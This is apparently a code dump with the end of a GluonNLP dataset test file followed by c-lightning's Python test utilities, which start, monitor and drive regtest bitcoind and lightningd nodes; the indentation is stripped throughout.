counter = nlp.data.Counter(gbw)
counter.discard(3, '<unk>')
# reference count obtained from:
# https://github.com/rafaljozefowicz/lm/blob/master/1b_word_vocab.txt
assert counter['the'] == 35936573
assert counter['.'] == 29969612
vocab = gbw.vocab
assert len(vocab) == 793471
def test_concatenation():
datasets = [
SimpleDataset([1,2,3,4]),
SimpleDataset([5,6]),
SimpleDataset([8,0,9]),
]
dataset = nlp.data.ConcatDataset(datasets)
assert len(dataset) == 9
assert dataset[0] == 1
assert dataset[5] == 6
def test_tsv():
data = "a,b,c\n"
data += "d,e,f\n"
data += "g,h,i\n"
with open('test_tsv.tsv', 'w') as fout:
fout.write(data)
num_discard = 1
field_separator = nlp.data.utils.Splitter(',')
field_indices = [0,2]
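# TSVDataset here: num_discard_samples=1 drops the header row, Splitter(',')
# splits each line on commas, and field_indices=[0, 2] keeps only the first and
# third columns, hence dataset[1] == ['g', 'i'] below.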
dataset = nlp.data.TSVDataset('test_tsv.tsv', num_discard_samples=num_discard,
field_separator=field_separator,
field_indices=field_indices)
num_samples = 3 - num_discard
idx = random.randint(0, num_samples - 1)
assert len(dataset) == num_samples
assert len(dataset[0]) == 2
assert dataset[1] == [u'g', u'i']
def test_numpy_dataset():
a = np.arange(6).reshape((2,3))
filename = 'test_numpy_dataset'
# test npy
np.save(filename, a)
dataset = nlp.data.NumpyDataset(filename + '.npy')
assert dataset.keys is None
assert len(dataset) == len(a)
assert np.all(dataset[0] == a[0])
assert np.all(dataset[1] == a[1])
# test npz with a single array
np.savez(filename, a)
dataset = nlp.data.NumpyDataset(filename + '.npz')
assert len(dataset) == len(a)
assert np.all(dataset[0] == a[0])
assert np.all(dataset[1] == a[1])
# test npz with multiple arrays
b = np.arange(16).reshape((2,8))
np.savez(filename, a=a, b=b)
dataset = nlp.data.NumpyDataset(filename + '.npz')
assert dataset.keys == ['a', 'b']
assert len(dataset) == len(a)
assert np.all(dataset[0][0] == a[0])
assert np.all(dataset[1][0] == a[1])
assert np.all(dataset[0][1] == b[0])
assert np.all(dataset[1][1] == b[1])
dataset_b = dataset.get_field('b')
assert np.all(dataset_b == b)
@pytest.mark.parametrize('cls,name,segment,length,fields', [
(nlp.data.GlueCoLA, 'cola', 'train', 8551, 2),
(nlp.data.GlueCoLA, 'cola', 'dev', 1043, 2),
(nlp.data.GlueCoLA, 'cola', 'test', 1063, 1),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueSST2, 'sst', 'train', 67349, 2),
(nlp.data.GlueSST2, 'sst', 'dev', 872, 2),
(nlp.data.GlueSST2, 'sst', 'test', 1821, 1),
# source: http://ixa2.si.ehu.es/stswiki/index.php/STSbenchmark
(nlp.data.GlueSTSB, 'sts', 'train', 5749, 3),
(nlp.data.GlueSTSB, 'sts', 'dev', 1500, 3),
(nlp.data.GlueSTSB, 'sts', 'test', 1379, 2),
# source: https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs
(nlp.data.GlueQQP, 'qqp', 'train', 363849, 3),
(nlp.data.GlueQQP, 'qqp', 'dev', 40430, 3),
(nlp.data.GlueQQP, 'qqp', 'test', 390965, 2),
# source: http://www.nyu.edu/projects/bowman/multinli/paper.pdf
(nlp.data.GlueMNLI, 'mnli', 'train', 392702, 3),
(nlp.data.GlueMNLI, 'mnli', 'dev_matched', 9815, 3),
(nlp.data.GlueMNLI, 'mnli', 'dev_mismatched', 9832, 3),
(nlp.data.GlueMNLI, 'mnli', 'test_matched', 9796, 2),
(nlp.data.GlueMNLI, 'mnli', 'test_mismatched', 9847, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueRTE, 'rte', 'train', 2490, 3),
(nlp.data.GlueRTE, 'rte', 'dev', 277, 3),
(nlp.data.GlueRTE, 'rte', 'test', 3000, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueQNLI, 'qnli', 'train', 108436, 3),
(nlp.data.GlueQNLI, 'qnli', 'dev', 5732, 3),
(nlp.data.GlueQNLI, 'qnli', 'test', 5740, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueWNLI, 'wnli', 'train', 635, 3),
(nlp.data.GlueWNLI, 'wnli', 'dev', 71, 3),
(nlp.data.GlueWNLI, 'wnli', 'test', 146, 2),
(nlp.data.GlueMRPC, 'mrpc', 'train', 3668, 3),
(nlp.data.GlueMRPC, 'mrpc', 'dev', 408, 3),
(nlp.data.GlueMRPC, 'mrpc', 'test', 1725, 2),
])
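# 'fields' is the number of columns per example; test segments omit the gold
# label and therefore carry one fewer field than the train/dev segments.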
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@pytest.mark.serial
@pytest.mark.remote_required
def test_glue_data(cls, name, segment, length, fields):
with warnings.catch_warnings():
if cls is nlp.data.GlueQQP: # QQP contains incomplete samples and raises warnings
warnings.simplefilter("ignore")
dataset = cls(segment=segment)
assert len(dataset) == length, len(dataset)
for i, x in enumerate(dataset):
assert len(x) == fields, x
@pytest.mark.parametrize('cls,name,segment,length,fields', [
(nlp.data.SuperGlueRTE, 'rte', 'train', 2490, 4),
(nlp.data.SuperGlueRTE, 'rte', 'val', 277, 4),
(nlp.data.SuperGlueRTE, 'rte', 'test', 3000, 3),
(nlp.data.SuperGlueCB, 'cb', 'train', 250, 4),
(nlp.data.SuperGlueCB, 'cb', 'val', 56, 4),
(nlp.data.SuperGlueCB, 'cb', 'test', 250, 3),
(nlp.data.SuperGlueWSC, 'wsc', 'train', 554, 4),
(nlp.data.SuperGlueWSC, 'wsc', 'val', 104, 4),
(nlp.data.SuperGlueWSC, 'wsc', 'test', 146, 3),
(nlp.data.SuperGlueWiC, 'wic', 'train', 5428, 10),
(nlp.data.SuperGlueWiC, 'wic', 'val', 638, 10),
(nlp.data.SuperGlueWiC, 'wic', 'test', 1400, 9),
(nlp.data.SuperGlueCOPA, 'copa', 'train', 400, 6),
(nlp.data.SuperGlueCOPA, 'copa', 'val', 100, 6),
(nlp.data.SuperGlueCOPA, 'copa', 'test', 500, 5),
(nlp.data.SuperGlueMultiRC, 'multirc', 'train', 456, 2),
(nlp.data.SuperGlueMultiRC, 'multirc', 'val', 83, 2),
(nlp.data.SuperGlueMultiRC, 'multirc', 'test', 166, 2),
(nlp.data.SuperGlueBoolQ, 'boolq', 'train', 9427, 4),
(nlp.data.SuperGlueBoolQ, 'boolq', 'val', 3270, 4),
(nlp.data.SuperGlueBoolQ, 'boolq', 'test', 3245, 3),
(nlp.data.SuperGlueReCoRD, 'record', 'train', 65709, 4),
(nlp.data.SuperGlueReCoRD, 'record', 'val', 7481, 4),
(nlp.data.SuperGlueReCoRD, 'record', 'test', 7484, 4),
# in AX-b dataset, number of fields may differ
(nlp.data.SuperGlueAXb, 'ax_b', None, 1104, None),
(nlp.data.SuperGlueAXg, 'ax_g', None, 356, 5),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_superglue_data(cls, name, segment, length, fields):
if segment:
dataset = cls(segment=segment, root=os.path.join(
'tests', 'externaldata', 'superglue', name))
else:
dataset = cls(root=os.path.join('tests', 'externaldata', 'superglue', name))
assert len(dataset) == length, len(dataset)
if fields:
for i, x in enumerate(dataset):
assert len(x) == fields, x
@pytest.mark.serial
@pytest.mark.remote_required
def test_parallel_load_pretrained_vocab():
def fn(name):
root = 'test_parallel_load_pretrained_vocab'
_ = nlp.data.utils._load_pretrained_vocab(name, root=root)
threads = []
name = 'openwebtext_book_corpus_wiki_en_uncased'
for _ in range(10):
x = threading.Thread(target=fn, args=(name,))
threads.append(x)
for t in threads:
t.start()
for t in threads:
t.join()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
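# logsearch_start records how far wait_for_logs has already scanned, so
# successive waits resume where the previous one left off instead of rematching
# old lines.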
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
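# Usage sketch (illustrative): every attribute access builds a fresh RawProxy
# and forwards the call over a throwaway connection, e.g.
#     rpc = SimpleBitcoinProxy(btc_conf_file='/tmp/bitcoind-test/bitcoin.conf')
#     rpc.getblockchaininfo()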
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
btc_conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
return proxy
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
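# Render self.opts into command-line flags: a None value becomes a bare
# '--key', a list value repeats '--key=value' once per element, and anything
# else becomes a single '--key=value'.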
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
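# Query a copy of the database so we do not contend with the running daemon
# for the live sqlite3 file.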
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop, be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to complete
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
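# The three entries feed the estimatesmartfee queries lightningd issues:
# (2, CONSERVATIVE), (4, ECONOMICAL) and (100, ECONOMICAL), roughly the
# urgent / normal / slow targets (inferred from the mock below).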
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
